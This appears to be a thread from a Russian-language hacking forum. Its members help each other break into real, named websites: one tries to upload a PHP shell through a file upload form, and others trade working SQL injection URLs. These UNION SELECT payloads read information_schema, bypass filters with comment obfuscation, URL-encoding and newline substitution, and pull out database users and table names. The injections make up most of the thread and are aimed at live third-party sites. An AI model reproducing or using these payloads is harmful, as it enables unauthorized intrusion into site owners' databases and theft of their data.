Ваши вопросы по уязвимостям.

Залей форму для загрузки файлов.

 

Открой сурс и посмотри. Скорее всего спецсимволы типа "<" записались в урлкодированном виде.
Пошли запрос не через браузер, а через HttpReq \ InetCrack \ или что-нибудь такого рода.

 

все символы записываются как надо, хтмл форму отоброжает а пхп не выполняет и отоброжает код пхп...

 

может что нить с .htaccess грамотное посоветуйте?

 

FlaktW
Какой смысл этого если у него PHP не интерпретируется?

Не удивительно =\

winstrool
Скинь мне линк в ПМ, посмотрю.

 

Ну так попробуй залить в другую директорию.

 

http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(CPU_USER,0x3b,CPU_SYSTEM),4,5+from+information_schema.profiling+--+
проблема с выводом данных
Попытался открыть базу tvlab не показало ни одной таблицы так ли это?

 

http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,count(*),4,5+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+

1


http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(0x0b,table_schema,0x3a,table_name),4,5+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+

tvlab:news

 

Как здесь обойти фильтрацию. Ветка БД на сайте 5, блиндом крутить лень.


http://www.gidacilar.com/view.php?id=1865'/**/*!union*/**/*!select*/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+&type=print

 

А в чём именно сложность заключается?

Code:

http://www.gidacilar.com/view.php?id=9999%27UnioN%28SelecT%281%29,2,3,4,5,6,user%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20%20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,%2841%29%29--+&type=print

 

помогите разобраться, вот скуль

на from срабатывает ошибка, пробовал хексить не помогает, символы /!* тоже не помогают, что можно придумать в такой ситуации?

 

БД зовут eshokcomua, а вот таблицы найти не смог...

 

так стандартный вывод тоже вывел

а вот когда начинаю использовать фром начинает выделываться...

 

http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+vse_chto_ugodno+--+

 

Не все, точку например нельзя!

http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information_schema.table+--+&lang=ua

http://eshoker.com.ua/buy.php?id=9+and+1=0+union+select+1,user(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+information_schematable+--+&lang=ua

 

без FROM там не обоийтись, по крайней мере я таких способов незнаю))

 

http://eshoker.com.ua/buy.php?id=9%0aand%0a1=0%0aunion%0aselect%0a1,2,table_name,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20%0afrom%0ainformation_schema.tables--+&lang=ua

Все выводится...

 

Извините за наивный вопрос. Где можно почитать про этот способ?

 

%0a это символ перевода строки "\n"

 

*:\Services\_InetPub\Domain\
*:\Services\_InetPub\Domain\subDomain\
Может оно